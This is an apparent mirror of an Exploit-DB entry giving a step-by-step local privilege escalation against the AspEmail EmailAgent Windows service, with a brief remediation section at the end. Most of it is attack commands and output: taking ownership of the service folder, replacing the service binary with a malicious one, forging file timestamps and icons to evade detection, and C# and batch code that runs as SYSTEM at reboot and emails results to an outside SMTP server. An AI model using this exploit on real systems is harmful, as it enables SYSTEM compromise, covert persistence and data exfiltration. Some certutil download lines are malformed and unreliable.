[local] AspEmail v5.6.0.2 - Local Privilege Escalation

 1 year ago
source link: https://www.exploit-db.com/exploits/51380
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

AspEmail v5.6.0.2 - Local Privilege Escalation



EDB Verified:







Vulnerable App:

# Exploit Title:  AspEmail - Local Privilege Escalation                                                    #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]                             #
# Date: 13/04/2023                                                                                                 #
# Exploit Author: Zer0FauLT [[email protected]]                                                               #
# Vendor Homepage: https://www.aspemail.com                                                                        #
# Software Link: https://www.aspemail.com/download.html                                                            #
# Product: AspEmail                                                                                                #
# Version: AspEmail and all                                                                                #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU                                                    #
# Tested on: Windows Server 2016 and Windows Server 2019                                                           #
# CVE : 0DAY                                                                                                       #

# ==================================================================================================================

[+] C:\PenTest>whoami /priv


 Privilege Name                Description                               State   
 ============================= ========================================= ========
 SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
 SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
 SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
 SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
# ==================================================================================================================

* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:

[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
   EmailAgent.exe                4400 Persits Software EmailAgent


[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
   EmailAgent64.exe                4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". 
* Now we know that AspEmail service is active.

# ==================================================================================================================

* We will need these:

[+] C:\PenTest>certutil -urlcache -split -f "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f "C:\PenTest\PrivescCheck.ps1"

# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

 Name: Persits Software EmailAgent
 ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
 Agent.exe" /run
 User              : LocalSystem
 ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
 IdentityReference : Everyone
 Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, 
 AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, 
 ReadExtendedAttributes, DeleteChild, Execute/Traverse
 Status            : Unknown
 UserCanStart      : False
 UserCanStop       : False
[+] C:\PenTest>del PrivescCheck.ps1

* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.

# ==================================================================================================================                                                                                     #

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"

    Successfully processed 0 files; Failed processing 1 files
    C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* We do not have permission to access subdirectories.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

 C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                            NT SERVICE\TrustedInstaller:(I)(CI)(F)
                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
* Unlike other directories, we have full privileges in the "BIN" directory of the service. 
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID


 \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                   

                                                                                      root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-32-544"  Win32_SID    Win32_SID  2  Administrators  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}  BUILTIN  S-1-5-32-544  16
 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.

# ==================================================================================================================

* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.

[+] C:\PenTest>whoami

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
  SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F

  processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
  Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.  
# ==================================================================================================================

* Now we will modify the EmailAgent file and inject a self-written malware. 
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe

# ==================================================================================================================

[+]  C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  13.04.2023  22:00            12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
# ==================================================================================================================

* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool. 
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  24.09.2003  09:21            12.288 EmailAgent.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
  [24.09.2003  09:21]            12.288 EmailAgent.exe
  [24.09.2003  09:21]           167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.

# ==================================================================================================================

* Now we check for my malware ownership.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID


  \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                                                                                                                                                

  \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"                                                     root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  Win32_SID    Win32_SID  2  Hacker  {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}  DeepSecLab  S-1-5-21-3674093405-176013069-2091862131-1511  28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name



   EmailAgent.exe Owner: DeepSecLab\Hacker

# =================================================================================================================#
#                                                                                                                  #
#                                               #[EmailAgent.cs]#                                                  #
#                                                                                                                  # 
* We program this malware in such a way that when the server is reboot(when the services are restarted),           #
* It will be triggered and execute the codes we want,                                                              #
* And then send a printout of all this to the email address we specified.                                          #
 using System;                                                                                                     #
 using System.Linq;                                                                                                #
 using System.Text;                                                                                                #
 using System.Diagnostics;                                                                                         #
 using System.IO;                                                                                                  #
 using System.Collections;                                                                                         #
 Namespace CliToolSpace                                                                                            #
 {                                                                                                                 #
     class _Main                                                                                                   #
     {                                                                                                             #
         static void Main(string[] args)                                                                           #
         {                                                                                                         #
             Cli commandLine = new Cli();                                                                          #
             commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");                         #
             commandLine.Execute();                                                                                #
             commandLine.ToFile(@"C:\Windows\Temp\");                                                              #
         }                                                                                                         #
     }                                                                                                             #
 }                                                                                                                 #
#                                                                                                                  #
#                                                 #[Mail.cs]#                                                      #
#                                                                                                                  #
 using System;                                                                                                     #
 using System.Net.Mail;                                                                                            #
 using System.Net;                                                                                                 #
 SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");                                                    #
 var mail = new MailMessage();                                                                                     #
 mail.From = new MailAddress("[email protected]");                                                               #
 mail.To.Add("[email protected]");                                                                                   #
 mail.Subject = "Trigger Successful!";                                                                             #
 mail.IsBodyHtml = true;                                                                                           #
 string htmlBody;                                                                                                  #
 htmlBody = "<strong>This server has been rebooted.</strong>";                                                     #
 mail.Body = htmlBody;                                                                                             #
 Attachment attachment;                                                                                            #
 attachment = new Attachment(@"C:\Windows\Temp\Export.txt");                                                       #
 mail.Attachments.Add(attachment);                                                                                 #
 SmtpServer.Port = 587;                                                                                            #
 SmtpServer.UseDefaultCredentials = false;                                                                         #
 SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]","p@ssw0rd123");                   #
 SmtpServer.EnableSsl = true;                                                                                      #
 SmtpServer.Timeout = int.MaxValue;                                                                                #
 SmtpServer.Send(mail);                                                                                            #
#                                                                                                                  #
#                                                 #[Run.bat]#                                                      #
#                                                                                                                  #
  whoami > C:\Windows\Temp\Export.txt                                                                              #
  cd C:\Program Files (x86)\Persits Software\AspEmail\Bin                                                          #
  del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe                                                      #
  cd c:\Windows\Tasks                                                                                              #
  del Run.bat & del Mail.exe                                                                                       #
#                                                                                                                  #
#                                                                                                                  #
                                             [+]Trigger Successful![+]                                             #
[+] C:\PenTest>systeminfo | findstr "Boot Time"                                                                    #
  System Boot Time:          13.04.2022, 07:46:06                                                                  #
#                                                                                                                  #
                                                  #[Export.txt]#                                                   #
#                                                                                                                  #
                                                NT AUTHORITY\SYSTEM				                   #
#                                                                                                                  #
#													           #									   
# ==================================================================================================================
#                                                   ...|||[FIX]|||...                                              #
# ==================================================================================================================
#                                [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+]                     #
# =================================================================================================================#

[+] C:\Administrator>sc qc "Persits Software EmailAgent"
  [SC] QueryServiceConfig SUCCESS

  SERVICE_Name: Persits Software EmailAgent
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 1   NORMAL
          BINARY_PATH_Name   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
          LOAD_ORDER_GROUP   :
          TAG                : 0
          DISPLAY_Name       : Persits Software EmailAgent
          DEPENDENCIES       : rpcss
          SERVICE_START_Name : LocalSystem

# ==================================================================================================================

[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"


# ==================================================================================================================

[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

  Accesschk v6.15 - Reports effective permissions for securable objects
  Copyright (C) 2006-2022 Mark Russinovich
  Sysinternals - www.sysinternals.com

  Persits Software EmailAgent
    Medium Mandatory Level (Default) [No-Write-Up]
    RW BUILTIN\Administrators
# ==================================================================================================================

[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

  Successfully processed 0 files; Failed processing 1 files
  C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.


# ==================================================================================================================

[+] C:\Administrator>sc stop "Persits Software EmailAgent"

[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.

# ==================================================================================================================

About Joyk

Aggregate valuable and interesting links.
Joyk means Joy of geeK